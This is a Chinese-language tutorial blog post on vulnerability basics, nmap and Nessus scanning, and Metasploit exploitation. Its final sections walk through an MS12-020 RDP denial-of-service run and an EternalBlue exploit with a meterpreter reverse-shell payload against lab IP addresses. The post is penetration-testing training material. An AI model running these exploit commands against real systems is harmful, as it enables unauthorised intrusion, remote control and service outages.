安全漏洞的检测利用

news2024/11/15 15:28:12

安全漏洞的检测&利用

  • 一、安全漏洞的基本概念
    • 1.1、什么是漏洞
    • 1.2、漏洞的简单理解
    • 1.3、微软的RPC漏洞与蠕虫病毒
    • 1.4、微软经典的蓝屏漏洞
    • 1.5、Heartbleed(心脏滴血)漏洞
    • 1.6、破壳漏洞CVE-2014-6271
    • 1.7、漏洞的危害
    • 1.8、漏洞的成因
    • 1.9、漏洞的信息的组成
    • 1.10、漏洞信息管理
  • 二、安全漏洞的基本概念
    • 2.1、漏洞检测技术
    • 2.2、常见的系统漏洞扫描器
    • 2.3、系统漏洞扫描的流程
    • 2.4、漏洞识别原理
    • 2.5、利用NMAP扫描漏洞
  • 三、Nessus的使用
    • 3.1、NESSUS简介
    • 3.2、NESSUS的功能介绍
    • 3.3、常见漏洞扫描的使用方法
    • 3.4、NESSUS的使用
    • 3.5、NESSUS的报告解读
  • 四、Matesploit介绍与漏洞利用
    • 4.1、Metasploit的简介
    • 4.2、Metasploit常用的命令
    • 4.3、metasploit攻击流程与思路
    • 4.4、使用metasploit进行漏洞利用
      • 4.4.1、使用metasploit进行ms12-020漏洞利用
      • 4.4.2、使用metasploit进行ms17-010漏洞利用

一、安全漏洞的基本概念

1.1、什么是漏洞

  • 漏洞Vulnerability)又叫脆弱性,这一概念早在1947年冯·诺依曼建立计算机系统结构理论时就有涉及,他认为计算机的发展和自然生命有相似性,一个计算机系统也有天生的类似基因的缺陷,也可能在使用和发展过程中产生意想不到的问题。
  • 1970 - 80年代,早期黑客的出现和第一个计算机病毒的产生,软件漏洞逐渐引起人们的关注。
  • 随着计算机应用的发展和互联网络的出现,漏洞相继在软件、硬件、管理过程,甚至人的环节出现,引起病毒泛滥、黑客猖獗,使得安全漏洞成为网络空间的一个现实、热门话题。

1.2、漏洞的简单理解

在这里插入图片描述

1.3、微软的RPC漏洞与蠕虫病毒

在这里插入图片描述

1.4、微软经典的蓝屏漏洞

  • MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞。
  • 远程桌面协议(RDP,Remote Desktop Protocol)一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。
  • 实际使用过程中通常用于造成蓝屏攻击。

在这里插入图片描述

1.5、Heartbleed(心脏滴血)漏洞

  • 2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160)。OpenSSL的Heartbleed模块存在一个漏洞,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy函数把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的OpenSSL服务器内存中多达64K的数据。
  • SSL(安全套接层)协议是使用最为普遍网站加密技术,而OpenSSL则是开源的SSL套件,为全球三分之二的web服务器所使用。Web服务器正是通过它来将密钥发送给访客然后在双方的连接之间对信总进行加密。
  • 2014年4月9日,Heartbleed(意为“心脏出血”)的重大安全漏洞被曝光,一位安全行业人士在知乎上透露,他在某著名电商网站上用这个漏洞尝试读取数据,在读取200次后,获得了40多个用户名、7个密码,用这些密码,他成功地登录了该网站。

在这里插入图片描述

1.6、破壳漏洞CVE-2014-6271

  • bash漏洞是控制Linux计算机命令提示符的软件中存在的漏洞。
  • bash是一个为GNU计划编写的Unix shell。它的名字是一系列缩写:Bourne-Again SHell,Bourne shell是一个早期的重要shell,由史蒂夫·伯恩在1978年前后编写,并同Version7 Unix一 起发布。
  • 2014年9月25日,外媒曝出一个广泛存在于主流操作系统的漏洞bash,该漏洞会影响到Redhat、CentOS、Ubuntu、Debian、Fedora、AmazonLinux、OSX10.10等平台。
  • 在实际的利用中,破壳漏洞常用于权限提升。

在这里插入图片描述

1.7、漏洞的危害

  • 远程控制
  • 信息泄露
  • 拒绝服务
  • 权限提升

1.8、漏洞的成因

  • 实现漏洞
    • 实现漏洞是安全漏洞中最大的一类,大多数我们接触到的安全漏洞都属于这一类。
    • 实现类漏洞是由于在程序编码时不够严谨或对于安全性的考虑不周而产生的漏洞,缓冲区溢出类漏洞是最典型的实现漏洞。
  • 设计漏洞
    • 设计漏洞主要是指软件、硬件和固件在设计时对于安全性考虑不周导致的漏洞。
    • 例如F5 BIG-ip远程绕过验证漏洞是由于F5设备的SSH登录模块内置了一个可用于登录的秘钥文件,这个秘钥被泄露后任意获取该秘钥的用户都可以登录任意一台相关版本的设备。
  • 配置漏洞
    • 配置漏洞是由于软件的默认配置或者不恰当的配置导致的安全漏洞。
    • 例如弱口令或默认口令就是一种常见的配置漏洞。在Windows NT系统中,默认情况下会允许远程用户建立空会话,枚举系统里的各项Net BIOS信息。这里空会话指可以用空的用户名和空的口令通过Net BIOS协议登录到远程的Windows系统中。

1.9、漏洞的信息的组成

  • 漏洞的主要组成部分:

    • 漏洞名称
    • 发布日期
    • 漏洞编号
    • 风险等级
    • 影响范围
    • 漏洞描述
    • 解决方案
      在这里插入图片描述
  • 漏洞风险等级评估:

CVSS(基础分值)

  1. CVSS分值:10 [严重(HIGH)]
  2. 机密性影响:COMPLETE [完全的信息泄露导致所有系统文件暴露]
  3. 完整性影响:COMPLETE [系统完整性可被完全破坏]
  4. 可用性影响:COMPLETE [可能导致系统完全宕机]
  5. 攻击复杂度:LOW [漏洞利用没有访问限制]
  6. 攻击向量:NETWORK [攻击者不需要获取内网访问权或本地访问权]
  7. 身份认证:NONE [漏洞利用无需身份认证]

1.10、漏洞信息管理

  • CVE(Common Vulnerabilities & Exposures,通用漏洞披露)
  • 美国国家漏洞数据库(NVD)
  • http://cve.mitre.org CVE官网
  • http://www.cnnvd.org.cn/index.html 国家信息安全漏洞库
  • http:/www.nsfocus.net/ 绿盟科技
  • http://www.scap.org.cn/ SCAP 安全内容自动化协议中文社区

二、安全漏洞的基本概念

2.1、漏洞检测技术

1、目标:研究专门的技术手段和方法,建立多角度的漏洞检测能力

  • 经验向理论转化
  • 形成自动化、规模化能力

2、 方法:

  • 静态分析(分析代码)
  • 动态分析(漏洞扫描,又可分为本地扫描和远程扫描)

2.2、常见的系统漏洞扫描器

系统漏洞扫描器是相对于WEB应用漏洞扫描器而言扫描器,主要是针对操作系统和各类通用性较强的软件应用进行漏洞检测的工具。

  • 软件类:
    • NESSUS
    • OpenVAS
    • namp
  • 硬件类:
    • 绿盟远程安全评估系统
    • 启明天镜脆弱性扫描与管理系统
    • 杭州迪普漏洞扫描系统
    • 榕基风险管理系统
    • 网御漏洞扫描系统

2.3、系统漏洞扫描的流程

系统漏洞扫描基本流程:
在这里插入图片描述

2.4、漏洞识别原理

漏洞识别的主要方法可以分为原理扫描推断扫描两类,在实际实现的过程中扫描器开发者会根据漏洞的特点不同选择不同的漏洞识别技术来进行漏洞识别。
在这里插入图片描述

2.5、利用NMAP扫描漏洞

  • 常见的NMAP脚本扫描:
    • 命令格式:nmap --script=<类别参数>
    • 脚本扫描参数:
      • broadcast 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
      • brute 提供暴力破解方式,针对常见的应用如http/snmp等
      • default 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
      • discovery 获取网络更多的信息,如SMB枚举、SNMP查询等
      • exploit 利用已知的漏洞入侵系统
      • fuzzer 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞
      • intrusive 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
      • malware 探测目标机是否感染了病毒、开启了后门等信息
      • safe此类与intrusive相反,属于安全性脚本
      • version 负责增强服务与版本扫描(VersionDetection)功能的脚本
      • vuln负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
  • 使用nmap --script=vuln 10.10.10.135扫描10.10.10.135中常是否有常见的漏洞
    • 最后发现有ms08-067等高危漏洞
      在这里插入图片描述
      在这里插入图片描述

三、Nessus的使用

3.1、NESSUS简介

Nessus是目前全世界最多人使用的系统漏洞扫描与分析软件,具有能够提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。可同时在本机或远端上摇控,进行系统的漏洞分析扫描,运作效能能随着系统的资源而自行调整。可自行定义插件(Plug-in)等特性。

3.2、NESSUS的功能介绍

  • 打开浏览器输入https://localhost:8834进入登录页面输入帐号密码登录NESSUS

  • 在首页选择newscans新建一个扫描任务,新建任务时需要对扫描进行选择或配置,带有upgrade标签的是需要升级成企业版或者专业办才能使用。
    在这里插入图片描述
    在这里插入图片描述

  • scanLibrary中选择BasicNetworkScan,进行配置,通常情况下只对General(一般选项)、Discovery(主机发现)、Assessment(风险评估)、及Advanced(高级选项)进行配置。

  • General(一般选项)
    在这里插入图片描述

  • Discovery(主机发现)
    在这里插入图片描述

  • Assessment(风险评估)
    在这里插入图片描述

  • 及Advanced(高级选项)
    在这里插入图片描述

3.3、常见漏洞扫描的使用方法

在这里插入图片描述

3.4、NESSUS的使用

使用NESSUS进行扫描的具体步骤:
1、在NewScan -> BasicNetworkScan下设置项目名称与描述,设置归属栏目为My scans,输入目标主机地址或网段。
在这里插入图片描述

2、可在首页查看扫描记录,点击对应的扫描任务可查看任务可查看任务的详细信息。
在这里插入图片描述
3、选择扫描任务进入后可查看扫描信息。
在这里插入图片描述

4、点击要查看的漏洞,可获取该漏洞的介绍、漏洞对应的解决方案、生成原因、涉及到的端口和主机信息。
在这里插入图片描述

在这里插入图片描述

3.5、NESSUS的报告解读

  • 漏洞风险等级
  • 漏洞描述
  • 漏洞涉及服务端口

四、Matesploit介绍与漏洞利用

4.1、Metasploit的简介

Metasploit就是一个漏洞利用框架。全称叫做TheMetasploitFramework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。

4.2、Metasploit常用的命令

Metasploit的常用命令:

  1. show exploits显示可用的渗透攻击模块。
  2. search用来搜寻一些渗透攻击模块,可以进行模糊匹配。
  3. use使用某个渗透攻击模块,可以通过use命令来使用showsearch出来的渗透模块。
  4. show options显示参数当选择渗透模块后,使用show options会显示该模块所需设置的参数。
  5. set命令是用来设置某些选项的,比如使用set命令设置,攻击模块的options参数;设置攻击载荷payloads时,也是用set命令。
  6. exploit命令,设置完所有参数时,使用exploit命令,开始进行攻击。

4.3、metasploit攻击流程与思路

使用Metasploit的具体思路:

  1. 搜索攻击模块;使用命令:search+漏洞信息或编号
  2. 使用某个模块;使用命令:use
  3. 查看配置选项;使用命令:show options
  4. 设置选项值;使用命令:set
  5. 开始攻击;使用命令:run/exploit

在这里插入图片描述

4.4、使用metasploit进行漏洞利用

4.4.1、使用metasploit进行ms12-020漏洞利用

1、在kali里面打开metasploit漏洞利用框架。
在这里插入图片描述

2、搜索ms12-020漏洞利用模块。

msf6 > search ms12-020

在这里插入图片描述
3、使用检测模块检测目标主机是否存在ms12-020漏洞。

msf6 > use auxiliary/scanner/rdp/ms12_020_check
msf6 auxiliary(scanner/rdp/ms12_020_check) > show options 	#查看需要配置的选项
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.9.131	#目标主机的IP地址
rhosts => 192.168.9.131
msf6 auxiliary(scanner/rdp/ms12_020_check) > show options 
msf6 auxiliary(scanner/rdp/ms12_020_check) > run

在这里插入图片描述
4、使用攻击模块进行攻击。

msf6 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 192.168.9.131	
rhosts => 192.168.9.131
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run

在这里插入图片描述
在这里插入图片描述
5、成功。

4.4.2、使用metasploit进行ms17-010漏洞利用

1、在kali里面打开metasploit漏洞利用框架。
在这里插入图片描述

2、搜索ms17-010漏洞利用模块。

msf6 > search ms17-010

在这里插入图片描述
3、使用检测模块检测目标主机是否存在ms17-010漏洞。

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options 
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.9.131
rhost => 192.168.9.131
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

在这里插入图片描述

4、使用攻击模块进行攻击。

msf6 > use  exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.9.131
rhosts => 192.168.9.131
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.9.148
lhost => 192.168.9.148
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

在这里插入图片描述
在这里插入图片描述
5、成功。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/732130.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

mysql工具sequel pro

一、安装sequel pro 下载地址&#xff1a;https://www.sequelpro.com/ 需要翻墙 二、安装mysql 下载地址&#xff1a;https://www.mysql.com/ 傻瓜式安装即可 记得设置密码 三、配置环境变量 &#xff08;1&#xff09;打开终端 &#xff08;2&#xff09;open ~/.bash_profile…

【送书福利-第十五期】计算机全栈高手到底该怎么发展?

大家好&#xff0c;我是洲洲&#xff0c;欢迎关注&#xff0c;一个爱听周杰伦的程序员。关注公众号【程序员洲洲】即可获得10G学习资料、面试笔记、大厂独家学习体系路线等…还可以加入技术交流群欢迎大家在CSDN后台私信我&#xff01; 本文目录 一、前言二、书籍介绍1、《前端…

0代码训练GPT-5?MIT微软证实GPT-4涌现自我纠错能力迭代

我们都知道&#xff0c;大模型具有自省能力&#xff0c;可以对写出的代码进行自我纠错。 这种自我修复背后的机制&#xff0c;究竟是怎样运作的&#xff1f; 对代码为什么是错误的&#xff0c;模型在多大程度上能提供准确反馈&#xff1f; 近日&#xff0c;MIT和微软的学者发…

【数据分析 - 基础入门之NumPy①】Anaconda安装及使用

知识目录 前言一、 Anaconda是什么二、为什么使用Anaconda三、安装步骤3.1 下载安装3.2 配置conda源 结语 前言 大家好&#xff01;我是向阳花花花花&#xff0c;本期给大家带来的是 Anaconda 安装及使用。 每日金句分享&#xff1a;故事不长&#xff0c;也不难讲。』—— 「…

期望DP入门

期望DP一般步骤&#xff1a; 1.模拟过程&#xff0c;找出线性性质&#xff0c;作为阶段&#xff08;这本质上也是线性DP&#xff09; 2.涉及DP状态 原则&#xff1a; 体现线性性质 体现边权 根据对期望有无贡献来设计状态 一般在状态设计时需要倒着设计 3.转移 根据边…

如何将自定义字体添加到 iOS 应用程序(SwiftUI + 得意黑)

1. 工具 Xcode Version 14.3 (14E222b)SwiftUI得意黑 Smiley Sans 2. Download https://github.com/atelier-anchor/smiley-sans/releases 3. Add Files to xxx 4. Add Test Code Text("Less is more. 朱洪苇 123").font(.custom("SmileySans-Oblique",…

【电子量产工具】4. UI系统

文章目录 前言一、UI界面分析二、结构体描述按钮三、按钮初始化四、默认绘制按键事件函数五、默认按下按键事件函数六、测试程序实验效果总结 前言 最近看了 电子量产工具 这个项目&#xff0c;本专栏是对该项目的一个总结。 一、UI界面分析 UI 是用户界面&#xff08;User In…

GEE:提取地区 NDVI/LST/RVI 并进行时间序列线性插值和SG滤波

作者&#xff1a;CSDN _养乐多_ 本文将介绍使用Landsat数据集&#xff0c;构建时间序列&#xff0c;并使用线性插值算法填补缺失数据&#xff0c;或者去云空洞&#xff0c;并进一步对完整的时间序列数据进行SG滤波处理。 文章目录 一、代码二、代码链接三、需要请私聊 一、代…

OPCUA 的历史数据库/聚合服务器的实现细节

进入了AI 大数据时代&#xff0c;无论是工业自动化系统&#xff0c;还是物联网系统&#xff0c;对大数据的采集&#xff0c;存储和分析都十分重要。大数据被称为工业的石油&#xff0c;未来制造业的持续改善离不开大数据。 传统的应用中&#xff0c;历史数据的存储是特定的数据…

官方外设库SDA安装和验证

第一种方法 1.打开mobaxterm&#xff0c;通过windows浏览器打开https://github.com/orangepi-xunlong/wiringOP下载压缩包&#xff0c;点击上传外设库的压缩包 2.输入命令 unzip 解压 3.输入命令 sudo ./build 安装工具包 4.验证安装完毕用 输入gpio readall 显示下面图片 第二…

数据分析实战(基础篇):从数据探索到模型解释

前言 本文着重介绍数据分析实战的基础知识和技巧&#xff0c;探索从数据探索到建模再到模型解释的完整过程内容包含数据探索、模型建立、调参技巧、SHAP模型解释数据来源于kaggle平台&#xff0c;crab age prediction数据集&#xff0c;数据详情 数据说明 数据背景 螃蟹味道…

【性能设计篇】聊聊异步处理

在性能设计的时候&#xff0c;其实主要的三板斧就是数据库(读写分离、分库分表)&#xff0c;缓存&#xff08;提升读性能&#xff09;&#xff0c;异步处理&#xff08;提升写性能&#xff09;以及相关的秒杀设计以及边缘设计等。 本篇主要介绍异步处理的哪些事&#xff0c;我们…

6.2.1 网络基本服务---域名解析系统DNS

6.2.1 网络基本服务—域名解析系统DNS 因特网是需要提供一些最基本的服务的&#xff0c;今天我们就来讨论一下这些基本的服务。 域名系统&#xff08;DNS&#xff09;远程登录&#xff08;Telnet&#xff09;文件传输协议&#xff08;FTP&#xff09;动态主机配置协议&#x…

Day47

思维导图 练习 实现登录框中&#xff0c;当登录成功时&#xff0c;关闭登录界面&#xff0c;并跳转到其他界面 second.h #ifndef SECOND_H #define SECOND_H#include <QWidget>namespace Ui { class Second; }class Second : public QWidget {Q_OBJECTpublic:explicit …

Matlab绘图时的几个小技巧(修改刻度线长度、添加/去掉右边和上面的轴与刻度线、出图时去掉旁边的空白部分)

set(gca,TickLength,[0.005,0.035]); %修改坐标轴刻度线的长度 box on; %开启右面和上面的坐标轴 box off;%关闭右面和上面的坐标轴 set(gca, LooseInset, [0,0,0,0]);%删除掉图旁边多余的空白部分首先随便出一张图 我想让刻度线更长或更短一些&#xff1a; 我想让右侧和上面…

OpenCV的安装与配置指南(Windows环境,Python语言)

OpenCV 的安装与配置指南&#xff08;Windows环境&#xff0c;Python语言&#xff09; 导语一、安装 Python 二、安装 OpenCV 库三、配置 OpenCV 环境变量四、验证 OpenCV 安装总结 导语 OpenCV 是一个功能强大的计算机视觉库&#xff0c;广泛应用于图像处理和计算机视觉领域。…

第十二章 elk

1、ELK可以帮助我们解决哪些问题 日志分布在多台不同的服务器上,业务一旦出现故障,需要一台台查看日志 单个日志文件巨大,无法使用常用的文本工具分析,检索困难; 2、架构设计分析 Filebeat和Logstash ELK架构中使用Logstash收集、解析日志,但是Logstash对内存、cpu、i…

MySQL入门必备:Linux中部署MySQL环境的四种方式详解

目录 一、仓库安装 二、本地安装 三、Docker中安装 四、源码安装 一、仓库安装 首先需要下载mysql软件包&#xff1a; 1、进入MySQL官网 2、进入MySQL社区版下载 3、使用yum方式下载MySQL 4、下载对应版本的软件包 5、这里可以不登录直接下载软件包 6、复制下载链接 7、然…

Perfetto详细解析

一、Perfetto基础 1、Perfetto介绍 Perfetto 是一个生产级的开源堆栈&#xff0c;用于提高性能 仪器和痕量分析。与 Systrace 不同&#xff0c;它提供数据源超集&#xff0c;可以用 protobuf 编码的二进制流形式记录任意长度的跟踪记录。可以将Perfetto理解为systrace的升级版…

Python——爬虫入门

爬虫的流程 第一步:获取网页内容 浏览器访问网页时也是一样&#xff0c;都是先发个请求获取网页内容&#xff0c;但是浏览器多了个渲染的步骤。 程序获取的内容都是网页源代码 第二步:解析网页内容 第三步:储存或分析数据 要做数据集就存起来&#xff0c;要做数据分析就形…